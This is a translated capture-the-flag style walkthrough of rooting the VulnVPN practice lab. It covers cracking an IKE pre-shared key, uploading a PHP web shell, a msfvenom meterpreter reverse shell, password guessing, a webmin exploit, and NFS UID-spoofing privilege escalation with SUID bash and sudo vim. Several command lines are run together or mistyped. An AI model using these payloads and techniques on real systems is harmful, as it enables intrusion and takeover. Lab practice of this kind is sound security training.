VulnVPN penetration platform practice
VulnVPN is an excellent vulnerability platform tool for VPN penetration testing. I have to say that this software makes it much easier for us to perform a VPN security test. This article will guide you through a VPN security test and show you how to successfully obtain the Root permission of a VPN step by step.
Environment Configuration
You need to download the VulnVPN software first. The following is:
VulnVPN: http://www.rebootuser.com/wp-content/uploads/vulnvpn/VulnVPN.7z
VulnVPN client: http://www.rebootuser.com/wp-content/uploads/vulnvpn/client.7z
Before that, I tried to install the 32-bit and 64-bit versions of Kali Linux, but found that it was not feasible (it should be a system version problem ), so here I chose to use the Backtrack 5 r3 32-bit version to install a virtual machine
First, we need to modify the network environment. Here we open the virtual network editor and change the nat ip address to 192.168.0.0, as shown in:
We will use the following Backtrack 5 r3 32-bit (BT5) virtual machine as the attacker
Now we create a new virtual machine and install BT5. We will not talk about the installation process here. It is certainly not a difficult task for FreeBufer.
To make our VulnVPN work properly, we need to install the following three packages:
1. openswan2, xl2tpd3, and ppp
The installation command is as follows:
apt-get install openswan xl2tpd ppp
After the installation is complete, the environment required for the attack will be ready. At this time, we start the downloaded VulnVPN, and we will not modify it at all, without any operation, We will pretend that this VPN is a remote VPN, how can we get the remote VPN :)
Then we need to set a static IP address on the BT5 attack host. It is also very easy to do. Just open the/etc/network/interfaces file and specify a static IP address for the eth0 port, the content is as follows:
auto eth0iface eth0 inet dhcp#iface eth0 inet staticaddress 192.168.0.11network 192.168.0.0netmask 255.255.255.0broadcast 192.168.0.255gateway 192.168.0.1
Then we need to download the above VPN Client File and decompress it for configuration. The specific method is as follows:
root@bt:~/vulnvpn/client# lsipsec.conf ipsec.secrets ppp start-vpn.shxl2tpdroot@bt:~/vulnvpn/client# cp ipsec.conf/etc/root@bt:~/vulnvpn/client# cp ipsec.secrets/etc/root@bt:~/vulnvpn/client# cpppp/options.l2tpd.client /etc/ppp/root@bt:~/vulnvpn/client# cpxl2tpd/xl2tpd.conf /etc/xl2tpd/
To start penetration, run the following command to view the environment of the following network:
root@bt:~/vulnvpn# netdisocver -r192.168.0.0/24
Scan the TCP port of the host 192.168.0.10
Here we use the nmap tool to scan the port of the VulnVPN host found above (for more information about how to use nmap, see <NMAP guide> ):
root@bt:~/vulnvpn# nmap -A 192.168.0.10
Scan the UDP port of the host 192.168.0.10
root@bt:~/vulnvpn# nmap -sU 192.168.0.10
Note: Port 81 in the above scan results is reserved for emergency purposes, not for attack targets and directions.
Through scanning, we found that VulnVPN runs the isakmp service on port 500.
Then we will conduct in-depth information collection for this service, but it is definitely not enough to continue using nmap at this time, here we use the ike-scan tool for the next step (ike-scan is a command line-based tool that mainly provides features such as host discovery and fingerprint recognition, can be used to test the IPSec VPN Server)
Then we use this tool for host scanning:
root@bt:~/vulnvpn# ike-scan -M -A-Pike-hash -d 500 192.168.0.10
The following describes several parameters of the tool:
-M: indented output-A: Attack Mode-P <File Name>: Specifies the file name written to the pre-shared key-d: UDP port of the target machine
The pre-shared key in the ike-hash file can be cracked using psk-crack. The cracking process is as follows:
root@bt:~/vulnvpn# psk-crack -d/pentest/passwords/wordlists/rockyou.txt ike-hash
Soon we get the password, which is 123456. here we can use this password to connect to VulnVPN. Edit the/etc/ipsec. secrets file and change the ENTER_PSK_HERE field to 123456. The command is as follows:
root@bt:~/vulnvpn# nano /etc/ipsec.secrets
Restart the ipsec service:
root@bt:~# /etc/init.d/ipsec restart
Then we can use the following command to check the started service:
root@bt:~# service –status-all
If the xl2tpd service is not started, you need to start it again:
root@bt:~# /etc/init.d/xl2tpd start
Now we connect to VulnVPN:
root@bt:~# ipsec auto –up vpn
Then we run the start-vpn.sh file in the client file, if the previous configuration is no problem, this time we should be able to see the establishment of a ppp0 interface:
root@bt:~/vulnvpn/client# sh start-vpn.shroot@bt:~/vulnvpn/client# ifconfig
Run the following command to check the active Host:
root@bt:~/vulnvpn# for ip in10.99.99.{1..255}; do ping -c 1 -t 1 $ip > /dev/null && echo “${ip}is up”; done
We know that 10.99.99.2 is our vpn ip address, while 10.99.99.1 is the VPN address.
Then we perform port scanning for 10.99.99.1:
root@bt:~/vulnvpn# nmap -A -p1-6553510.99.99.1
We can see that the HTTP service is running on port 80 of 10.99.99.1. Let's see what it is.
It seems that there is nothing special. It doesn't matter. Let's look at port 10000:
First, analyze the HTTP service. We can see that this is the default page after the Apache HTTP service is installed. There is nothing special. We need to perform in-depth scanning and Analysis for more information. Here we use DirBuster for further scanning:
The process is described as follows:
We can see from the results that a WordPress is built on the HTTP service. Curiosity drives us to look at this WP page:
1 http: // 10.99.99.1/wordpress/
Here is an upload page of the main site:
The first response here is to see if there is any Parsing Vulnerability. Here we will try to pass a php sentence (cmd. php ):
<?phphighlight_string(shell_exec($_REQUEST['cmd']));?>
The default WordPress upload path is/wp-content/uploads/. Let's take a look:
After checking, we found that the path of the PHP file we uploaded is under the rsjp/attachments/folder, but the file name is changed to a string of random strings. Here we can get a web shell:
The shell is equivalent to the half of the success. We can use the command to obtain a meterpreter. Of course, first we need to generate a meterpreter php shell:
msfvenom -p php/meterpreter/reverse_tcpLHOST=10.99.99.2 LPORT=4444 -f raw > meter.php
Then we enable a handler for listening:
Then we get a meterpreter session. However, using shell directly is not very convenient. We use python to obtain an interactive shell:
Meterpreter> shellpython -c “importpty;pty.spawn(‘/bin/bash’);”
Let's take a look at the passwd file:
www-data@vulnvpn:/$ cat /etc/passwd
After analyzing the passwd file, we can see several interesting users:
Rootwww-databobjane
Don't forget, we also had a login page running on port 10000 during our analysis: https: // 10.99.99.1: 10000/
We do not know what the password is, but we can use the information obtained from the first vulnerability to create a user list. We will use some common passwords for the password and then click here to guess, the result of a group of guesses is as follows:
User Passwordbob bob
Note: multiple attempts will blacklist the IP address for a short time.
Search msf to see if there are any webmin-related public vulnerabilities.
We were lucky. After searching, we found a Public exp:
Metasploit:exploit/unix/webapp/webmin_show_cgi_exec
Note: If this exp is not found, your msf needs to be upgraded.
Then we use this exp to obtain the root permission of the server:
Another way to get root
Here we use the hydra dictionary mode to crack the SSH service, and then pretend that we have obtained the user name and password (which is easy to say... However, if you have the same luck as the hacker uncle p0tt1, it must be very simple)
From the Nmap scan results, we can see a Network File System (NFS)
We load an NFS scan module in msf:
Metasploit: auxiliary/scanner/nfs/nfsmount
Here we can see that a path/home/bob exists.
Let's take a look at mounting:
root@bt:~/vulnvpn# mount10.99.99.1:/home/bob /root/vulnvpn/bob -o nolock
Then list the document:
root@bt:~/vulnvpn# ls -lah ./bob
Wipe! Why are all the files uploaded by Mao s users?
<FreeBuf tips>
The answer to the question is: after NFS is mounted, the permissions of the file are not passed through the user name and group, and the UID and GID are passed, therefore, after arriving at the local machine, it becomes an existing user name of the local machine, that is, ipvs, and this user is on the BT5 machine rather than VulnVPN. We can view our BT5 passwd file and we will find that the user with UID 1000 is exactly ipvs. Now we use the first vulnerability to read the content of the/etc/passwd file of VulnVPN. We can see that bob is the user whose UID is 1000 in VulnVPN.
</FreeBuf tips>
To put it bluntly, when we tried to write a file in NFS with the root permission of BT5, we found an error:
This is because "Root Squashing" is enabled for NFS, so we cannot use root at this time. So at this time, we switch to the user whose UID is 1000, and the local user is ipvs, so that we can create a file again without any problems.
root@bt:~/vulnvpn# su postgressh-4.1$ chmd 777
Copy the/bin/bash file to./bob:
sh-4.1$ cp /bin/bash ./
Because root does not have the write permission to the mounted folder, and we already have a shell returned from www-date. The permission is a user named jane with ID 1001. We can create a user with the same information locally:
root@bt:~/vulnvpn# useradd -u 1001 jane
Now we switch to the user we just created:
root@bt:~/vulnvpn/bob# su janesh-4.1$ whoami
Use the jane user to copy/bin/bash to the Mount directory, and modify the permission to 4777, which means that no matter who calls this bash, the account's permissions will be obtained.
sh-4.1$ cp /bin/bash ./mybashsh-4.1$ chmod 777 mybash
The username and password we cracked previously worked. We use SSH to log on:
root@bt:~/vulnvpn/bob# ssh bob@10.99.99.1
Now We append the-p parameter to run the bash we just copied:
bob@vulnvpn:~$ ./mybash –p
From the token, we can see that we are currently logged on with the jane user, but both UID and GID are still owned by the bob user, so we can use this to find a way to escalate permissions.
For this purpose, I wrote a section C (priv1.c ):
void main(){/* setreuid(ruid,euid)sets the real andeffective user IDs of the current process to the values specified by the ruidand euid arguments */setreuid(1001,-1);char *args[] = {“/bin/bash”,0};execve(args[0],args,0);}
We compile this section of C, and then copy the compiled file to NFS as the user jane.
Before that, of course, gcc needs to be installed. you can install gcc on your own if you do not have it.
Root @ bt :~ /Vulnvpn # apt-get install gcc
Then we compile:
root@bt:~/vulnvpn# gcc priv1.c -o priv1root@bt:~/vulnvpn# chmod 777 priv1root@bt:~/vulnvpn# cd bobroot@bt:~/vulnvpn/bob# su janesh-4.1$ cp ../priv1 ./
Now, we will return to the SSH session to execute the compiled file:
mybash-4.1$ ./priv1
Let's try the command to run the root permission:
jane@vulnvpn:/home/bob$ sudo –l
We found that using the jane user, we can run commands with root permissions (such as vim) without entering the password.
If you do not know whether this is the case, let's give it a try:
jane@vulnvpn:/home/bob$ vim
After running vim, press ":" and then enter "! <Command>"
Let's open a shell...
jane@vulnvpn:/home/bob$ sudo vim
The root permission is obtained.